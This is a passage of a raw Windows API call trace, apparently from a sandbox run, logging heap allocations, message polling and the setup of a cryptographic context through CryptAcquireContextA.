(HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0246.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0246.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0246.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0246.657] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0246.657] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.657] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0246.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0246.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0246.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.658] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0246.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0246.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0246.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0246.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0246.659] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0246.723] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.724] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.724] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0246.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56060 | out: hHeap=0x970000) returned 1 [0246.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0246.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0246.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.724] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0246.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0246.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0246.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0246.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0246.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0246.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0246.726] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0246.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0246.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0246.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0246.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0246.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0246.727] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0246.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0246.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0246.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0246.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0246.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0246.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0246.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0246.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0246.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.730] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 